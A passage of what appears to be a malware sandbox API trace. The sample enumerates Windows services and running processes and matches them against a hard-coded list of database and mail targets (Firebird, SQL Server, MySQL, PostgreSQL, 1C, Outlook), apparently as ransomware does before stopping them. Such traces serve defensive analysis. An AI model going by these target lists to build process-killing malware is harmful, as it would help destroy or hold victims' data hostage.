(lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0044.517] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0044.517] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0044.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0044.517] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0044.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.517] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0044.517] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0044.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0044.517] lstrlenW (lpString="AudioSrv") returned 8 [0044.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0044.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0044.517] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0044.517] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0044.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0044.517] lstrlenW (lpString="BFE") returned 3 [0044.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0044.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0044.517] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0044.517] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0044.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0044.517] lstrlenW (lpString="CryptSvc") returned 8 [0044.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0044.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0044.517] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0044.517] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0044.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0044.517] lstrlenW (lpString="CscService") returned 10 [0044.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0044.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0044.517] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0044.518] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0044.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0044.518] lstrlenW (lpString="DcomLaunch") returned 10 [0044.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.518] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0044.518] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0044.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0044.518] lstrlenW (lpString="Dhcp") returned 4 [0044.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0044.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0044.518] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0044.518] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0044.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0044.518] lstrlenW (lpString="Dnscache") returned 8 [0044.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0044.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0044.518] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0044.518] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0044.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0044.518] lstrlenW (lpString="DPS") returned 3 [0044.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0044.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0044.518] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0044.518] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0044.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0044.518] lstrlenW (lpString="eventlog") returned 8 [0044.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0044.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0044.518] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0044.518] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0044.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0044.518] lstrlenW (lpString="EventSystem") returned 11 [0044.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0044.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0044.519] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0044.519] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0044.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0044.519] lstrlenW (lpString="gpsvc") returned 5 [0044.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0044.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0044.519] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0044.519] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0044.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0044.519] lstrlenW (lpString="iphlpsvc") returned 8 [0044.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.519] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0044.519] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0044.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0044.519] lstrlenW (lpString="LanmanServer") returned 12 [0044.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0044.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0044.519] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0044.519] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0044.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0044.519] lstrlenW (lpString="LanmanWorkstation") returned 17 [0044.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.519] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0044.519] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0044.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0044.519] lstrlenW (lpString="lmhosts") returned 7 [0044.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0044.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0044.519] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0044.519] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0044.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0044.520] lstrlenW (lpString="MMCSS") returned 5 [0044.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0044.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0044.520] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0044.520] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0044.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0044.520] lstrlenW (lpString="MpsSvc") returned 6 [0044.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0044.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0044.520] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0044.520] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0044.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0044.520] lstrlenW (lpString="Netman") returned 6 [0044.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0044.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0044.520] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0044.520] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0044.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0044.520] lstrlenW (lpString="netprofm") returned 8 [0044.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0044.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0044.520] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0044.520] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0044.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0044.520] lstrlenW (lpString="NlaSvc") returned 6 [0044.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0044.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0044.520] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0044.520] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0044.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0044.520] lstrlenW (lpString="nsi") returned 3 [0044.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0044.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0044.521] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0044.521] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0044.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0044.521] lstrlenW (lpString="PcaSvc") returned 6 [0044.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0044.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0044.521] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0044.521] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0044.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0044.521] lstrlenW (lpString="PlugPlay") returned 8 [0044.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0044.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0044.521] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0044.521] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0044.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0044.521] lstrlenW (lpString="Power") returned 5 [0044.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0044.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0044.521] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0044.521] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0044.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0044.521] lstrlenW (lpString="ProfSvc") returned 7 [0044.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0044.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0044.521] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0044.521] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0044.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0044.521] lstrlenW (lpString="RpcEptMapper") returned 12 [0044.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.522] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0044.522] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0044.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0044.522] lstrlenW (lpString="RpcSs") returned 5 [0044.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0044.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0044.522] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0044.522] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0044.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0044.522] lstrlenW (lpString="SamSs") returned 5 [0044.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0044.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0044.522] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0044.522] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0044.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0044.522] lstrlenW (lpString="Schedule") returned 8 [0044.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0044.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0044.522] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0044.522] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0044.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0044.522] lstrlenW (lpString="SENS") returned 4 [0044.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0044.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0044.522] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0044.522] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0044.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0044.522] lstrlenW (lpString="ShellHWDetection") returned 16 [0044.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.522] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0044.522] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0044.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0044.523] lstrlenW (lpString="Spooler") returned 7 [0044.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0044.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0044.523] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0044.523] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0044.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0044.523] lstrlenW (lpString="swprv") returned 5 [0044.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0044.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0044.523] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0044.523] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0044.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0044.523] lstrlenW (lpString="SysMain") returned 7 [0044.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0044.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0044.523] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0044.523] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0044.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0044.523] lstrlenW (lpString="Themes") returned 6 [0044.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0044.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0044.523] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0044.523] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0044.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0044.523] lstrlenW (lpString="TrkWks") returned 6 [0044.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0044.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0044.523] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0044.523] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0044.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0044.523] lstrlenW (lpString="UxSms") returned 5 [0044.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0044.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0044.524] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0044.524] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0044.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0044.524] lstrlenW (lpString="VSS") returned 3 [0044.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0044.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0044.524] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0044.524] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0044.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0044.524] lstrlenW (lpString="WdiServiceHost") returned 14 [0044.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.524] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0044.524] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0044.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0044.524] lstrlenW (lpString="WdiSystemHost") returned 13 [0044.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.524] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0044.524] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0044.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0044.524] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0044.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.524] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0044.524] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0044.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0044.524] lstrlenW (lpString="Winmgmt") returned 7 [0044.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0044.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0044.524] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0044.524] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0044.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0044.524] lstrlenW (lpString="WPDBusEnum") returned 10 [0044.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.525] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0044.525] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0044.525] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0044.525] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3808fc0 | out: hHeap=0x5f0000) returned 1 [0044.525] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0044.527] Process32FirstW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0044.528] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0044.528] lstrlenW (lpString="System") returned 6 [0044.528] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0044.528] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0044.528] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0044.528] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0044.528] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0044.528] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0044.528] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0044.528] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0044.529] lstrlenW (lpString="smss.exe") returned 8 [0044.529] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0044.529] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0044.529] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0044.529] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0044.529] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0044.529] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0044.529] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0044.529] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.530] lstrlenW (lpString="csrss.exe") returned 9 [0044.530] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0044.530] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0044.530] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0044.530] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0044.530] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0044.530] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0044.530] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0044.530] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0044.531] lstrlenW (lpString="wininit.exe") returned 11 [0044.531] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0044.531] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0044.531] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0044.531] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.532] lstrlenW (lpString="csrss.exe") returned 9 [0044.532] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0044.533] lstrlenW (lpString="winlogon.exe") returned 12 [0044.533] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0044.533] lstrlenW (lpString="services.exe") returned 12 [0044.533] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0044.534] lstrlenW (lpString="lsass.exe") returned 9 [0044.534] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, 